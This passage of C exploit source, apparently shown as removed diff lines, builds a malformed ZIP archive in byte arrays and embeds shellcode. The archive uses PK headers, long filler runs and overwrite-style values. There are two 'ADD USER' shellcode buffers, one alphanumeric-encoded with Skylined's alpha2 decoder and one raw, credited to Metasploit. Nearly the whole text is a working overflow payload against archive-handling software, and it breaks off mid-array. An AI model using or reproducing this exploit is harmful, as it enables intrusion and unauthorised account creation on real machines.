-"\x65\x7A\x6A\x75\x71\x63\x62\x75\x71\x70\x7A\x61\x7A\x69\x27\x74" -"\x75\x72\x65\x6F\x7A\x6E\x62\x69\x6A\x75\x76\x62\x67\x73\x64\x75" -"\x69\x71\x79\x72\x7A\x61\x6A\x20\x62\x63\x73\x64\x6F\x70\x69\x75" -"\x72\x79\x7A\x6F\x65\x61\x71\x6E\x62\x69\x6F\x64\x73\x79\x72\x66" -"\x65\x7A\x71\x6F\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72" -"\x61\x7A\x62\x69\x6A\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73" -"\x71\x69\x6A\x62\x66\x65\x7A\x71\x75\x61\x66\x64\x64\x64\x64\x64" 
-"\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x68\x68" -"\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75" -"\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7A" -"\x65\x6F\x62\x76\x69\x6F\x7A\x65\x71\x66\x74\x72\x65\x6F\x7A\x71" -"\x6A\x6E\x62\x76\x64\x73\x70\x69\x79\x75\x66\x71\x6F\x65\x69\x68" -"\x66\x72\x6F\x75\x65\x7A\x68\x61\x72\x62\x20\x69\x76\x66\x64\x73" -"\x70\x6F\x68\x6A\x72\x65\x71\x6F\x75\x68\x66\x7A\x65\x61\x71\x75" -"\x68\x76\x71\x6F\x75\x68\x65\x66\x6F\x71\x73\x69\x6A\x68\x64\x6F" -"\x73\x71\x68\x76\x64\x6F\x69\x68\x7A\x61\x71\x6F\x65\x69\x68\x66" -"\x64\x73\x6F\x69\x75\x68\x76\x63\x78\x77\x69\x75\x68\x66\x71\x6F" -"\x75\x69\x68\x76\x77\x78\x6F\x69\x68\x66\x64\x73\x71\x6F\x69\x68" -"\x76\x64\x73\x71\x6F\x69\x75\x68\x7A\x67\x66\x6F\x69\x68\x73\x64" -"\x71\x6F\x69\x75\x68\x67\x7A\x65\x71\x6F\x69\x68\x67\x73\x71\x6F" -"\x69\x68\x67\x7A\x61\x65\x7A\x72\x75\x79\x61\x75\x79\x74\x61\x65" -"\x70\x69\x75\x79\x55\x59\x54\x4F\x5A\x52\x45\x50\x49\x48\x47\x41" -"\x5A\x55\x59\x56\x44\x53\x4F\x49\x59\x54\x41\x50\x4F\x49\x55\x45" -"\x59\x52\x49\x55\x45\x5A\x59\x47\x42\x4B\x4A\x43\x58\x4E\x4B\x56" -"\x4E\x4B\x43\x58\x42\x57\x56\x4B\x4A\x4E\x42\x43\x58\x48\x42\x4B" -"\x4A\x44\x48\x46\x4F\x49\x48\x5A\x45\x52\x4F\x49\x55\x48\x45\x5A" -"\x55\x49\x4F\x41\x42\x45\x5A\x55\x49\x42\x47\x55\x49\x56\x43\x50" -"\x4C\x44\x53\x47\x57\x4B\x52\x54\x42\x4E\x49\x55\x43\x49\x55\x4F" -"\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5A\x49\x55\x45" -"\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5A\x55\x45\x59\x52" -"\x5A\x45\x55\x48\x52\x54\x49\x55\x50\x56\x58\x57\x4B\x4A\x43\x4E" -"\x48\x42\x47\x50\x46\x4F\x49\x55\x50\x41\x49\x52\x59\x45\x5A\x4F" -"\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35\x39\x34\x38\x33" -"\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56" -"\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33" -"\x39\x38\x41\x59\x39\x46\x38\x45\x51\x59\x5A\x35\x39\x38\x59\x36" 
-"\x39\x38\x46\x47\x59\x39\x38\x51\x59\x39\x47\x46\x44\x53\x55\x59" -"\x30\x39\x48\x34\x5A\x48\x33\x37\x38\x35\x32\x33\x31\x42\x34\x47" -"\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4F\x59\x50" -"\x52\x39\x5A\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53" -"\x53\x53\x53\x53\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46" -"\x39\x49\x53\x50\x47\x42\x55\x54\x50\x5A\x39\x38\x59\x35\x33\x41" -"\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52\x45\x5A\x47\x52" -"\x46\x44\x53\x49\x4F\x5A\x48\x45\x52\x42\x4E\x4F\x56\x46\x44\x53" -"\x4F\x49\x52\x48\x54\x4F\x5A\x49\x4E\x46\x47\x44\x4B\x4E\x46\x43" -"\x58\x4C\x4B\x59\x89\x05\x8A\x9B\x98\x98\x98\x4F\x49\x49\x49\x49" -"\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42" -"\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48" -"\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44" -"\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F\x4D\x4E\x4F\x4C\x36\x4B" -"\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x42\x36\x4B" -"\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45\x44\x4E\x43\x4B\x38\x4E" -"\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B\x48\x4F\x34\x4A\x51\x4B" -"\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49\x44\x4B\x38\x46\x43\x4B" -"\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49\x59\x4E\x4A\x46\x58\x42" -"\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D\x30\x41\x30\x44\x4C\x4B" -"\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A\x52\x45\x57\x45\x4E\x4B" -"\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48\x36\x4B\x58\x4E\x50\x4B" -"\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B\x4E\x43\x30\x4E\x52\x4B" -"\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41\x36\x43\x4C\x41\x43\x4B" -"\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B\x48\x42\x44\x4E\x50\x4B" -"\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42\x44\x4A\x30\x50\x45\x4A" -"\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42\x35\x4F\x4F\x48\x4D\x48" -"\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44\x33\x4A\x56\x47\x37\x43" -"\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42\x4D\x4A\x36\x4B\x4C\x4D" 
-"\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48\x4D\x4F\x45\x49\x58\x45" -"\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44\x30\x45\x35\x4C\x36\x44" -"\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49\x50\x45\x4F\x4D\x4A\x47" -"\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43" -"\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42\x4D\x48\x46\x4A\x56\x41" -"\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41\x4E\x45\x59\x4A\x46\x46" -"\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F\x4F\x48\x4D\x4C\x36\x42" -"\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x46\x4A\x4D\x4A\x50" -"\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43\x55\x45\x45\x4F\x4F\x42" -"\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49\x44\x47\x45\x4F\x4F\x48" -"\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F\x4F\x42\x4D\x43\x39\x4A" -"\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47\x45\x4F\x4F\x48\x4D\x45" -"\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46\x36\x48\x36\x4A\x56\x43" -"\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42\x45\x49\x35\x49\x32\x4E" -"\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49\x58\x44\x4E\x41\x43\x42" -"\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D\x32\x50\x4F\x44\x34\x4E" -"\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B\x4A\x4B\x4A\x4B\x4A\x4A" -"\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F\x4F\x45\x37\x46\x44\x4F" -"\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4C" -"\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4F\x4F\x42\x4D\x4A" -"\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43\x55\x4F\x4F\x48\x4D\x4C" -"\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42\x4D\x4B\x48\x47\x45\x4E" -"\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48\x4D\x44\x45\x4F\x4F\x42" -"\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F\x45\x43\x55\x4F\x4F\x48" -"\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" 
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xFD\x81\x98\x98\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" 
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2E\x74" -"\x78\x74\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC" -"\xCE\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08" -"\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" -"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45" -"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x43\x43\x43\x43\x43\x43\x43\x43\x43" -"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x41\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41"; - - char file_2[]= -"\x41\x41\x41\x41\xCC\xCC\xCC\xCC\x41\x41\x41\x41" 
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4A\x4A\x4A\x4A\x4A\x4A" -"\x4A\x4A\x4A\x4A\x4A\x4A\x4A\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B" -"\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C" -"\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x4D\x4D\x4D\x4D\x4D\x4D\x4D\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E" -"\x4E\x4E\x4E\x4E\x4E\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4F\x4F\x4F\x4F" -"\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x50\x50\x50\x50\x50\x50" -"\x50\x50\x50\x50\x50\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x51\x51\x51\x51\x51\x51\x51" -"\x51\x51\x32\x32\x32\x32\x32\x89\x03\x59\x89\x05\x8A\x9B\x98\x98" -"\x98\x4F\x49\x49\x49\x49\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30" -"\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56" -"\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42" 
-"\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F" -"\x4D\x4E\x4F\x4C\x36\x4B\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F" -"\x4F\x4F\x4F\x42\x36\x4B\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45" -"\x44\x4E\x43\x4B\x38\x4E\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B" -"\x48\x4F\x34\x4A\x51\x4B\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49" -"\x44\x4B\x38\x46\x43\x4B\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49" -"\x59\x4E\x4A\x46\x58\x42\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D" -"\x30\x41\x30\x44\x4C\x4B\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A" -"\x52\x45\x57\x45\x4E\x4B\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48" -"\x36\x4B\x58\x4E\x50\x4B\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B" -"\x4E\x43\x30\x4E\x52\x4B\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41" -"\x36\x43\x4C\x41\x43\x4B\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B" -"\x48\x42\x44\x4E\x50\x4B\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42" -"\x44\x4A\x30\x50\x45\x4A\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42" -"\x35\x4F\x4F\x48\x4D\x48\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44" -"\x33\x4A\x56\x47\x37\x43\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42" -"\x4D\x4A\x36\x4B\x4C\x4D\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48" -"\x4D\x4F\x45\x49\x58\x45\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44" -"\x30\x45\x35\x4C\x36\x44\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49" -"\x50\x45\x4F\x4D\x4A\x47\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43" -"\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42" -"\x4D\x48\x46\x4A\x56\x41\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41" -"\x4E\x45\x59\x4A\x46\x46\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F" -"\x4F\x48\x4D\x4C\x36\x42\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A" -"\x56\x46\x4A\x4D\x4A\x50\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43" -"\x55\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49" -"\x44\x47\x45\x4F\x4F\x48\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F" -"\x4F\x42\x4D\x43\x39\x4A\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47" -"\x45\x4F\x4F\x48\x4D\x45\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46" 
-"\x36\x48\x36\x4A\x56\x43\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42" -"\x45\x49\x35\x49\x32\x4E\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49" -"\x58\x44\x4E\x41\x43\x42\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D" -"\x32\x50\x4F\x44\x34\x4E\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B" -"\x4A\x4B\x4A\x4B\x4A\x4A\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F" -"\x4F\x45\x37\x46\x44\x4F\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41" -"\x35\x41\x45\x41\x35\x4C\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41" -"\x45\x4F\x4F\x42\x4D\x4A\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43" -"\x55\x4F\x4F\x48\x4D\x4C\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42" -"\x4D\x4B\x48\x47\x45\x4E\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48" -"\x4D\x44\x45\x4F\x4F\x42\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F" -"\x45\x43\x55\x4F\x4F\x48\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61" -"\x82\xFD\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" 
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" -"\x32\x32\x32\x32\x2E\x74\x78\x74\x50\x4B\x05\x06\x00\x00\x00\x00" -"\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00"; - - - char shellcode_1[]= - // Skylined's alpha2 unicode decoder - //Un-encoded ADD USER shellcode - "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA" - "BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB" - // Encoded opcodes - "ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM" - "kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp" - "tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0" - "C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s" - 
"mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
- "MPNOOQa4oTkPA";
- //ADD USER shellcode TNX to metasploit
- char shellcode_2[]=
- "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
- "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
- "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
- "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
- "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
- "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
- "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
